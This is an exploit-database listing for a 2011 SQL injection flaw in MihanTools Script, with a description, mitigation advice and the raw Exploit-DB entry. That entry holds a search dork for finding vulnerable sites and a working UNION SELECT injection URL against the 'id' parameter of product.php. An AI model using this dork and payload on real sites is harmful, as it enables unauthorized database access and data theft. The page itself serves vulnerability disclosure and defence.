header-logo
Suggest Exploit
vendor:
MihanTools Script
by:
WHITE_DEVIL
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MihanTools Script
Affected Version From: all version
Affected Version To: all version
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Sp2
2011

MihanTools Script SQL Injection Vunerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'product.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can allow the attacker to steal sensitive information from the database, modify data, deface the site, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before passing it to the database.
Source

Exploit-DB raw data:

# Exploit Title: MihanTools Script SQL Injection Vunerability  
# Platform: php  
# Date: 09.02.2011  
# Author: WHITE_DEVIL  
# Software Link: http://www.mihantools.ir/   
# Version: all version  
# Tested on: Windows Sp2  
# Mail: Mr.web70@yahoo.com  
# Dork: inurl:product.php?id= *Powered by MihanTools* 
# Exploit:  

http://localhost/product.php?id=-1+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--  
  

# Greetings:  
IRAQ_JAGUAR, Joker_Sql, Karar_Alshami, Karar_Aljbory

Navigation

Suggest Exploit

Services By CQR